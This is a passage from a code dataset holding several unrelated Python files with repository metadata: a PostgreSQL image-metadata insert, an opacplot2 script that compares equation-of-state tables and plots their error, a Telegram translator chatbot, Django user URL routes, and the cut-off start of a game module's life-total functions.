connection.commit()\n print(cursor.rowcount, \"Record inserted successfully into metadata of image files table\")\n\n except(Exception, psycopg2.Error) as error:\n print(\"Failed inserting record into metadata of image file table {}\".format(error))\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error while creating PostgreSQL table\", error)\n finally:\n # closing database connection.\n if connection:\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n","repo_name":"YashKalbande/ai-files-managment-software","sub_path":"ImgDatabase.py","file_name":"ImgDatabase.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"74454974444","text":"import opacplot2 as opp\nimport argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path\nimport periodictable as ptab\nimport scipy as sp\nplt.rcParams.update({'text.usetex': False})\n\ndef get_input_data():\n\n parser = argparse.ArgumentParser(\n description=\"This script is used to check error differences\"\n \"between two files.\")\n\n\n\n parser.add_argument('-v', '--verbose',\n action='store_const', const=True,\n help='Verbosity option.')\n\n\n parser.add_argument('input_1',\n action='store', type=str,\n help='Input file 1.')\n\n parser.add_argument('input_2',\n action='store', type=str,\n help='Input file 2.')\n\n parser.add_argument('-f', '--filetypes',\n action='store', type=str,\n help='Input filetypes.')\n\n parser.add_argument('--mpi_1',\n action='store', type=str,\n help='Mass per ion for file 1.')\n\n parser.add_argument('--mpi_2',\n action='store', type=str,\n help='Mass per ion for file 2.')\n\n parser.add_argument('--Znum_1',\n action='store', type=str,\n help='Atomic numbers for file 1.')\n\n parser.add_argument('--Znum_2',\n action='store', type=str,\n help='Atomic numbers for file 2.')\n\n parser.add_argument('--Xfracs_1',\n action='store', type=str,\n help='Number fractions for file 1.')\n\n parser.add_argument('--Xfracs_2',\n action='store', type=str,\n help='Number fractions for file 2.')\n\n parser.add_argument('--filters_1',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 1 (g/cm^3, eV).')\n\n parser.add_argument('--filters_2',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 2 (g/cm^3, eV).')\n\n parser.add_argument('-p','--plot',\n action='store_const',\n const=True, default=False)\n\n parser.add_argument('--writelog',\n action='store_const',\n const=True, default=False,\n help='Write error values to file.')\n\n parser.add_argument('--lin_grid',\n action='store_const',\n const=True, default=False,\n help='Linear values for interpolated grid.')\n\n parser.add_argument('--tabnum_1',\n action='store', type=str,\n help='Specify the SESAME table number for file 1.')\n\n parser.add_argument('--tabnum_2',\n action='store', type=str,\n help='Specify the SESAME table number for file 2.')\n\n args = parser.parse_args()\n\n # Get the relevant paths and filenames.\n path_in_1 = os.path.abspath(args.input_1)\n path_in_2 = os.path.abspath(args.input_2)\n\n basedir_1, fn_1 = os.path.split(path_in_1)\n basedir_2, fn_2 = os.path.split(path_in_2)\n\n # Split filename twice in case of MULTI files (.opr.gz, etc)\n basename_1 = os.path.splitext(os.path.splitext(fn_1)[0])[0]\n basename_2 = os.path.splitext(os.path.splitext(fn_2)[0])[0]\n\n # Create lists for filetypes.\n if args.filetypes is not None:\n args.filetypes = [typ for typ in args.filetypes.split(',')]\n\n if args.Znum_1 is not None:\n args.Znum_1 = [num for num in args.Znum_1.split(',')]\n if args.Znum_2 is not None:\n args.Znum_2 = [num for num in args.Znum_2.split(',')]\n\n # Convert mpis to float.\n if args.mpi_1 is not None:\n args.mpi_1 = float(args.mpi_1)\n if args.mpi_2 is not None:\n args.mpi_2 = float(args.mpi_2)\n\n # Convert xfracs to float list.\n if args.Xfracs_1 is not None:\n args.Xfracs_1 = [float(x) for x in args.Xfracs_1.split(',')]\n if args.Xfracs_2 is not None:\n args.Xfracs_2 = [float(x) for x in args.Xfracs_2.split(',')]\n\n # Set defaults for SESAME filters.\n if args.filters_1 is not None:\n args.filters_1 = [float(num) for num in args.filters_1.split(',')]\n else:\n args.filters_1 = [0., 0.,]\n if args.filters_2 is not None:\n args.filters_2 = [float(num) for num in args.filters_2.split(',')]\n else:\n args.filters_2 = [0., 0.,]\n\n # Convert tabnum into int.\n if args.tabnum_1 is not None:\n try:\n args.tabnum_1 = int(args.tabnum_1)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 1.')\n if args.tabnum_2 is not None:\n try:\n args.tabnum_2 = int(args.tabnum_2)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 2.')\n\n\n input_data = {'args':args,\n 'basename_1':basename_1,\n 'basename_2':basename_2,\n 'path_in_1':path_in_1,\n 'path_in_2':path_in_2,\n 'basedir_1':basedir_1,\n 'basedir_2':basedir_2,\n 'fn_1':fn_1,\n 'fn_2':fn_2}\n\n\n return input_data\n\ndef read_format_ext(args, f_1, f_2):\n # Try to read from the input file extension.\n ext_dict = {'.prp':'propaceos',\n '.eps':'multi',\n '.opp':'multi',\n '.opz':'multi',\n '.opr':'multi',\n '.mexport':'sesame-qeos',\n '.ses':'sesame',\n '.cn4':'ionmix'}\n\n # If the input file is compressed, choose the next extension.\n if os.path.splitext(f_1)[1] == '.gz':\n _, ext_1 = os.path.splitext(os.path.splitext(f_1)[0])\n else:\n _, ext_1 = os.path.splitext(f_1)\n\n if os.path.splitext(f_2)[1] == '.gz':\n _, ext_2 = os.path.splitext(os.path.splitext(f_2)[0])\n else:\n _, ext_2 = os.path.splitext(f_2)\n\n # Choose the correct input type based on extension and set args.input\n # accordingly.\n args.filetypes = []\n if ext_1 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_1]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_1))\n if ext_2 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_2]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_2))\n\nclass Formats_Read(object):\n \"\"\"\n Reads in a file and returns an object with useful attributes based on the\n corresponding opacplot2 object. This class also includes the naming\n conventions for each format.\n\n\n This procedure is preferred (although it is rather redundant with the\n rest of opacplot2) since it preserves the original structure of the\n opacplot2 object & all calculations & processing is done in this class\n alone. This way, the mechanisms are more transparent for error checking.\n\n\n Returns\n -------\n Formats_Read\n Formats_Read().data is the opacplot2 object corresponding to the input\n file.\n\n Formats_Read().ft is the filetype of the input file.\n\n Formats_Read().common_keys are the \"common dictionary style\" keys for\n opacplot2.\n \"\"\"\n\n # Names dictionaries.\n # Convert \"common dictionary style\" keys -> Format keys\n propaceos_names_dict = {'idens' : 'nion',\n 'temp' : 'temp',\n 'dens' : 'dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'eint',\n 'Uec_DT' : 'eele',\n 'Ui_DT' : 'eion',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'opp_mg' : 'opp_mg',\n 'opr_mg' : 'opr_mg',\n 'emp_mg' : 'emp_mg',\n 'opp_int' : 'opp_int',\n 'opr_int' : 'opr_int',\n 'emp_int' : 'emp_int',\n 'Znum' : 'Znum',\n 'Anum' : 'Anum',\n 'Xnum' : 'Xnum',\n 'Anum_prp': 'Anum_prp',\n 'groups' : 'groups',\n 'Zsymb' : 'Zsymb',\n 'BulkMod' : 'BulkMod',\n 'ElemNum' : 'ElemNum',\n 'Abar' : 'Abar',\n 'Zmax' : 'Zmax'}\n\n multi_names_dict = {'idens':'idens',\n 'temp':'temp',\n 'dens':'dens',\n 'Zf_DT':'zbar',\n 'opp_mg':'opp_mg',\n 'opr_mg':'opr_mg',\n 'Znum':'Znum',\n 'Anum':'Anum',\n 'Xnum':'Xnum',\n 'groups':'groups',\n 'Abar':'Abar',\n 'Zmax':'Zmax',\n 'emp_mg':'emp_mg'}\n\n sesame_names_dict = {'idens':'idens',\n 'temp':'ele_temps',\n 'dens':'ele_dens',\n 'Zf_DT':'zbar',\n 'Ut_DT':'total_eint',\n 'Uec_DT':'ele_eint',\n 'Ui_DT':'ioncc_eint',\n 'Pi_DT':'ioncc_pres',\n 'Pec_DT':'ele_pres',\n 'Znum':'Znum',\n 'Xnum':'Xnum',\n 'BulkMod':'bulkmod',\n 'Abar':'abar',\n 'Zmax':'zmax'}\n\n\n sesame_qeos_names_dict = {'idens' : 'idens',\n 'temp' : 'ele_temps',\n 'dens' : 'ele_dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'total_eint',\n 'Uec_DT' : 'ele_eint',\n 'Ui_DT' : 'ion_eint',\n 'Pi_DT' : 'ion_pres',\n 'Pec_DT' : 'ele_pres',\n 'Znum' : 'Znum',\n 'Xnum' : 'Xnum',\n 'BulkMod' : 'bulkmod',\n 'Abar' : 'abar',\n 'Zmax' : 'zmax'}\n\n\n ionmix_names_dict = {'Znum' : 'zvals',\n 'Xnum' : 'fracs',\n 'idens' : 'numDens',\n 'temp' : 'temps',\n 'Zf_DT' : 'zbar',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'Ui_DT' : 'eion',\n 'Uec_DT' : 'eele',\n 'groups' : 'opac_bounds',\n 'opr_mg' : 'rosseland',\n 'opp_mg' : 'planck_absorb',\n 'emp_mg' : 'planck_emiss'}\n\n # Inverted names: Convert format keys -> \"common dictionary style\" keys\n propaceos_names_dict_inv = {v:k for k, v\n in propaceos_names_dict.items()}\n multi_names_dict_inv = {v:k for k, v\n in multi_names_dict.items()}\n sesame_names_dict_inv = {v:k for k, v\n in sesame_names_dict.items()}\n sesame_qeos_names_dict_inv = {v:k for k, v\n in sesame_qeos_names_dict.items()}\n ionmix_names_dict_inv = {v:k for k, v\n in ionmix_names_dict.items()}\n\n def __init__(self, form, basedir, basename, path_in,\n mpi=None, znum=None, xnum=None,\n filters=[0.,0.], verbose=False, tabnum=None):\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Set attributes.\n self.form = form\n self.basedir = basedir\n self.basename = basename\n self.path_in = path_in\n self.mpi = mpi\n self.znum = znum\n self.filters = filters\n self.verbose = verbose\n self.xnum = xnum\n self.tabnum = tabnum\n\n # For SESAME, we need the hedp package to calculate zbar.\n need_hedp_list = ['sesame', 'sesame-qeos']\n if self.form in need_hedp_list:\n try:\n global hedp\n import hedp.eos\n except ImportError:\n raise ImportError('You need the hedp module. You can get it here: '\n 'https://github.com/luli/hedp.')\n\n # Use handle_dict to create the eos_dict based on the input format.\n try:\n self.data = self.handle_dict[self.form]()\n self.ft = self.form\n except KeyError:\n raise KeyError('{} is not a valid format name!'.format(self.form))\n\n def set_handle_dict(self):\n self.handle_dict = {'propaceos' : self.propaceos_read,\n 'multi' : self.multi_read,\n 'sesame' : self.sesame_read,\n 'sesame-qeos' : self.sesame_qeos_read,\n 'ionmix' : self.ionmix_read}\n\n def propaceos_read(self):\n # If we are unable to find the correct script for opg_propaceos\n # we need to let the user know.\n try:\n import opacplot2.opg_propaceos\n op = opp.opg_propaceos.OpgPropaceosAscii(self.path_in)\n self.common_keys = [self.propaceos_names_dict_inv[key]\n for key in op.keys()\n if key in self.propaceos_names_dict_inv.keys()]\n return op\n except ImportError:\n raise ImportError('You do not have the opg_propaceos script.')\n\n def multi_read(self):\n op = opp.OpgMulti.open_file(self.basedir, self.basename)\n\n # Decide if we need Znum, and Xnum, calculate Anum if it is not given.\n if self.znum is None:\n if 'Znum' in op:\n self.znum = op['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n if type(self.znum) is int:\n self.znum = [self.znum]\n op['Znum'] = np.array(self.znum, dtype='int')\n op['Anum'] = np.array([ptab.elements[el].mass for el in op['Znum']])\n if self.xnum is None:\n if len(self.znum) == 1:\n op['Xnum'] = np.array([1.0])\n else:\n raise ValueError('Xnum array should be provided')\n else:\n op['Xnum'] = np.array(Xnum)\n\n # Setting more attributes.\n op['Abar'] = np.sum(op['Xnum']*op['Anum'])\n op['Zmax'] = np.sum(op['Xnum']*op['Znum'])\n op['idens'] = op['dens']*opp.NA/op['Abar']\n self.common_keys = [self.multi_names_dict_inv[key]\n for key in op.keys()\n if key in self.multi_names_dict_inv.keys()]\n return op\n\n def sesame_read(self):\n # TODO Add options for single vs double\n if self.verbose:\n print('Opening up QEOS SESAME file {}...'.format(self.path_in))\n # Try SINGLE precision and then DOUBLE if that doesn't work.\n try:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n except ValueError:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n \n # If there is more than one table, fail. Use sesame-extract\n # to create a one-table file.\n if len(op.data.keys()) > 1:\n raise Warning('More than one material ID found. '\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n \n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n if self.verbose:\n print('Setting the atomic numbers...')\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ioncc'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=False)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_names_dict_inv.keys()]\n\n return op\n\n def sesame_qeos_read(self):\n raise Warning('QEOS-SESAME is not ready yet!')\n\n if self.verbose:\n print('Opening up QEOS SESAME file {}...'.format(self.path_in))\n # Try SINGLE precision and then DOUBLE if that doesn't work.\n try:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n except ValueError:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n if len(op.data.keys()) > 1:\n raise Warning('More than one material ID found. '\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n\n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ion'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=True)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_qeos_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_qeos_names_dict_inv.keys()]\n\n return op\n\n def ionmix_read(self):\n if self.verbose:\n print('Opening up IONMIX file {}...'.format(self.path_in))\n if self.mpi is None:\n raise Warning('Need mpi for ionmix!')\n else:\n # TODO Add options for man and twot\n op = opp.OpacIonmix(self.path_in, self.mpi, man=True, twot=True)\n self.common_keys = [self.ionmix_names_dict_inv[attr]\n for attr in dir(op)\n if attr in self.ionmix_names_dict_inv.keys()]\n return op\n\nclass get_eos_array(object):\n \"\"\"\n Gets an EoS array based on the input opacplot2 object.\n \"\"\"\n def __init__(self, eos, arr):\n\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Use handle_dict to create the eos_dict based on the input format.\n try:\n self.arr = self.handle_dict[eos.ft](eos, arr)\n # TODO fix this, error handling is not useful since key erros come\n # from everywhere in this class.\n except KeyError:\n raise KeyError('{} is not a valid format name!'.format(eos.ft))\n\n def set_handle_dict(self):\n self.handle_dict = {'propaceos' : self.propaceos,\n 'multi' : self.multi,\n 'sesame' : self.sesame,\n 'sesame-qeos' : self.sesame_qeos,\n 'ionmix' : self.ionmix}\n\n def propaceos(self, eos, arr):\n return eos.data[Formats_Read.propaceos_names_dict[arr]]\n\n def multi(self, eos, arr):\n return eos.data[Formats_Read.multi_names_dict[arr]]\n\n def sesame(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n data_dict = eos.data.data[table_key]\n return data_dict[Formats_Read.sesame_names_dict[arr]]\n\n def sesame_qeos(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n data_dict = eos.data.data[table_key]\n return data_dict[Formats_Read.sesame_qeos_names_dict[arr]]\n\n def ionmix(self, eos, arr):\n return getattr(eos.data, Formats_Read.ionmix_names_dict[arr])\n\ndef compare_eos(eos_1, eos_2, verbose=False,\n plot=False,\n write_log_file=False,\n lin_grid=False):\n\n logfile_name = 'eos_errors.txt'\n\n # Union of all \"common dictionary format\" keys to do a full error report.\n # Not including 'idens', 'dens', 'temp', 'groups', 'opp_mg', 'opp_int',\n # 'opr_int', 'emp_mg', 'opr_mg', 'emp_int', 'Abar','Zmax', 'Ut_DT',\n # 'Znum', 'BulkMod', 'Xnum', 'Anum', 'Zsymb', 'ElemNum', 'Anum_prp'.\n # (aka no opacity data currently).\n # TODO add opacity comparison capabilities.\n keys = ['Pec_DT', 'Zf_DT', 'Pi_DT', 'Uec_DT', 'Ui_DT']\n\n shared_keys = [key for key in keys\n if key in eos_1.common_keys\n and key in eos_2.common_keys]\n\n if verbose:\n err_report_str = 'Performing error report on:\\n'\n for i in range(len(shared_keys)):\n err_report_str += '{}. {}\\n'.format((i+1), shared_keys[i])\n print(err_report_str)\n\n # Perform error report using number densities.\n error_report = []\n\n # Freak out if there is no number density.\n if 'idens' not in eos_1.common_keys or 'idens' not in eos_2.common_keys:\n raise Warning('No number density data!')\n\n # Get the temperature and density arrays.\n dens_1 = get_eos_array(eos_1, 'idens').arr\n temp_1 = get_eos_array(eos_1, 'temp').arr\n dens_2 = get_eos_array(eos_2, 'idens').arr\n temp_2 = get_eos_array(eos_2, 'temp').arr\n\n # These will be used for the interpolator function `griddata`.\n d_interp_1, t_interp_1 = np.meshgrid(dens_1, temp_1)\n d_interp_2, t_interp_2 = np.meshgrid(dens_2, temp_2)\n\n # Creating a new grid to interpolate onto.\n d = opp.utils.intersect_1D_sorted_arr(dens_1, dens_2)\n t = opp.utils.intersect_1D_sorted_arr(temp_1, temp_2)\n D_new, T_new = np.meshgrid(d,t)\n\n # These will be used for the interpolator function `griddata`.\n d_interp_1, t_interp_1 = np.meshgrid(dens_1, temp_1)\n d_interp_2, t_interp_2 = np.meshgrid(dens_2, temp_2)\n\n if (d is None) or (t is None):\n raise Warning('Density and temperature arrays must have some overlap!')\n if verbose:\n print('Density range: {:.5E} to {:.5E} #/cm^3.'.format(d[0], d[-1]))\n print('Temperature range: {:.5E} to {:.5E} eV.'.format(t[0], t[-1]))\n print('Generating error report...')\n\n fn_1 = os.path.split(eos_1.path_in)[1]\n fn_2 = os.path.split(eos_2.path_in)[1]\n\n if write_log_file:\n # Append heading for our current grid.\n with open(logfile_name, 'a') as f:\n f.write('Files: {}, {}\\n'.format(fn_1, fn_2))\n f.write('[Array, RMS Error, Absolute Error]\\n')\n\n # Do analysis on each of the shared keys.\n for key in shared_keys:\n # Get the data.\n data_1 = get_eos_array(eos_1, key).arr\n data_2 = get_eos_array(eos_2, key).arr\n\n # Use interpolation to account for mismatched grid sizes.\n # `rescale=True` to account for the orders of magnitude difference\n # in the dens/temp grids.\n # `scipy.interpolate.interp2d` was not giving accurate interpolation.\n # I believe this is due to the orders of magnitude difference also,\n # which `griddata` can easily fix. - JT\n # Additionally, `griddata` is much faster than using an interpolator\n # function to fill an empty grid.\n interp_data_1 = sp.interpolate.griddata(\n (d_interp_1.flatten(), t_interp_1.flatten()),\n data_1.T.flatten(),\n (D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n interp_data_2 = sp.interpolate.griddata(\n (d_interp_2.flatten(), t_interp_2.flatten()),\n data_2.T.flatten(),(D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n\n interp_data_1 = interp_data_1.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_2 = interp_data_2.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_1 = interp_data_1.T\n interp_data_2 = interp_data_2.T\n\n err_1_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_1)\n err_2_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_2)\n\n err_1_rms = np.sqrt(err_1_sqr.mean())\n err_2_rms = np.sqrt(err_2_sqr.mean())\n err_rms = max(err_1_rms, err_2_rms)\n\n err_1_abs = np.sqrt(np.max(err_1_sqr))\n err_2_abs = np.sqrt(np.max(err_2_sqr))\n err_abs = max(err_1_abs, err_2_abs)\n\n fmt='%.0f %%'\n if plot:\n titles = {'Zf_DT':'Average Ionization',\n 'Pec_DT':'Electron Pressure',\n 'Pi_DT':'Ion Pressure',\n 'Uec_DT':'Electron Energy',\n 'Ui_DT':'Ion Energy'}\n\n fig, axarr = plt.subplots(1,3)\n x, y = np.meshgrid(d, t)\n res_levels = {0:.1, 1:.01, 2:.0001 }\n fig.set_size_inches(21, 6)\n\n for i in range(3):\n levels = np.linspace(0, res_levels[i], 256)\n cs = axarr[i].contourf(x, y, np.sqrt(err_1_sqr).T,\n levels, extend='max')\n cb = plt.colorbar(cs, ax=axarr[i])\n cb.formatter = matplotlib.ticker.FuncFormatter(lambda x,p: '{:.1e}%'.format(float(x)*100))\n cb.update_ticks()\n if i==2:\n cb.set_label('% Error')\n if not lin_grid:\n axarr[i].loglog()\n axarr[i].set_xlim((d[0], d[-1]))\n axarr[i].set_ylim((t[0], t[-1]))\n axarr[i].set_xlabel('rho [#/cm^(3)]')\n axarr[i].set_ylabel('T [eV]')\n\n fig.tight_layout()\n fig.suptitle('{} % Error for {} vs. {}'.format(titles[key], fn_1, fn_2))\n fig.subplots_adjust(top=0.85)\n fig.savefig('{}.png'.format(key+'_err'))\n\n if write_log_file:\n with open(logfile_name, 'a') as f:\n f.write('{}, {}, {}\\n'.format(key, err_rms, err_abs))\n\n print('Error statistics for {}:'.format(key))\n print('RMS % Error: {:.5e}.'.format(err_rms*100))\n print('Max % Absolute Error: {:.5e}.'.format(err_abs*100))\n\ndef check_error():\n input_data = get_input_data()\n\n if input_data['args'].filetypes is None:\n read_format_ext(input_data['args'],\n input_data['fn_1'],\n input_data['fn_2'])\n\n eos_1 = Formats_Read(input_data['args'].filetypes[0],\n input_data['basedir_1'],\n input_data['basename_1'],\n input_data['path_in_1'],\n mpi=input_data['args'].mpi_1,\n znum=input_data['args'].Znum_1,\n xnum=input_data['args'].Xfracs_1,\n filters=input_data['args'].filters_1,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_1)\n\n eos_2 = Formats_Read(input_data['args'].filetypes[1],\n input_data['basedir_2'],\n input_data['basename_2'],\n input_data['path_in_2'],\n mpi=input_data['args'].mpi_2,\n znum=input_data['args'].Znum_2,\n xnum=input_data['args'].Xfracs_2,\n filters=input_data['args'].filters_2,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_2)\n\n compare_eos(eos_1, eos_2, verbose=input_data['args'].verbose,\n plot=input_data['args'].plot,\n write_log_file=input_data['args'].writelog,\n lin_grid=input_data['args'].lin_grid)\n\nif __name__=='__main__':\n check_error()\n","repo_name":"flash-center/opacplot2","sub_path":"opacplot2/scripts/opac_error.py","file_name":"opac_error.py","file_ext":"py","file_size_in_byte":32047,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"46059533428","text":"# Get token of telegram chat bot\nfile = open(\"Telegram_chatbot_token.txt\",\"r\")\nToken = file.read()\n\nCallBot = \"No\"\nAskBot = \"No\"\nBotAsk = \"No\"\nChat_id = None\n\nfrom telegram.ext import Updater,CommandHandler,MessageHandler,Filters\nfrom Translator import translatorAI\n\ndef main():\n # Updater update from telegram and push it to Dispatcher\n updater = Updater(Token)\n\n # Link updater with dispatcher\n dispatcher = updater.dispatcher\n print(\"Bot start\")\n\n # Add command handle vs message handle\n start_handler = CommandHandler(['Ronet','hi'],start)\n translate_handler = CommandHandler('translate',translate)\n Message_handler = MessageHandler(Filters.text,sendMessage)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(translate_handler)\n dispatcher.add_handler(Message_handler)\n\n # Start chatbot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n# Handle start command\ndef start(bot, update):\n update.message.reply_text(\"Hi, I am translator bot !\")\n print(update.message.chat.id)\n\n# Handle command translate\ndef translate(bot,update):\n string=update.message.text[11:]\n update.message.reply_text(\"It may take some minutes ...\")\n update.message.reply_text(\"Translate: \\n\"+translatorAI(string))\n\n# Handler conversation with both \ndef sendMessage(bot,update):\n # Define global var for state of conversation\n global AskBot, CallBot, BotAsk, Chat_id\n\n # put message received onto analyze\n String = update.message.text\n List = String.split(' ')\n\n # Try to make bot deploy on single conversation\n if Chat_id == update.message.chat_id or Chat_id is None:\n\n # state 1: bot ask usr for conversation\n if CallBot == \"No\" and AskBot == \"No\" and BotAsk == \"No\":\n for name in List:\n if name == \"@ronet20190310_bot\":\n Chat_id = update.message.chat_id\n bot.sendMessage(Chat_id,\"Do you call me ?\")\n BotAsk = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 2: usr confirm conversation\n elif BotAsk == \"Yes\" and CallBot == \"No\" and AskBot == \"No\":\n for name in List:\n if name == \"yes\" or name == \"Yes\":\n bot.sendMessage(Chat_id,\"What do you want ?\")\n CallBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 3: usr ask bot for function\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"No\":\n for name in List:\n if name == \"translate\" or name == \"Translate\":\n bot.sendMessage(Chat_id,\"Enter text you want to translate !\")\n AskBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This feature not yet update on me, sorry\\n This conversation close\") \n BotAsk = CallBot = AskBot =\"No\"\n Chat_id = None\n\n # state 4: bot answer usr\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"Yes\":\n bot.sendMessage(Chat_id,\"Please waiting for translation ...\")\n bot.sendMessage(Chat_id,translatorAI(String))\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n else:\n bot.sendMessage(update.message.chat_id,\"Bot is busy now\")\n \n# Main runnning function\nif __name__ == '__main__':\n main()\n","repo_name":"larycoder/chatbots","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"30762178618","text":"from django.urls import path\nfrom ecommerce.views import user_views as views\n\nurlpatterns = [\n # using the custom token view that has custom user data\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('register/', views.registerUser, name=\"register\"),\n path('profile/', views.getUser, name=\"users-profile\"),\n path('profile/update/', views.updateUser, name=\"users-profile-update\"),\n path('', views.getUsers, name=\"users\"),\n\n]","repo_name":"Jacob-Hoff-man/django-ecommerce","sub_path":"django-ecommerce/ecommerce/urls/user_urls.py","file_name":"user_urls.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40749180213","text":"from actions.evaluate import evaluate\n\n\ndef loseLife(game, source, player, amountToLose):\n \"\"\"Set the life total for selected player to (current life - the amount to lose)\n\n Args:\n game (Game): Game Object\n source (Card): Source of the life loss\n player (Player): Player that is loosing life\n amountToLose (Int): The amount of life to lose\n\n Returns:\n None\n \"\"\"\n if amountToLose == 0:\n return\n player.lifeTotal -= amountToLose\n\n game.notifyAll(\"Life Total Update\", {\n \"gameID\": game.gameID,\n \"playerID\": player.playerID,\n \"life\": player.lifeTotal\n })\n\n\ndef gainLife(game, source, player, amountToGain):\n \"\"\"Set the life total for selected player to (current life + the amount to gain)\n\n Args:\n game 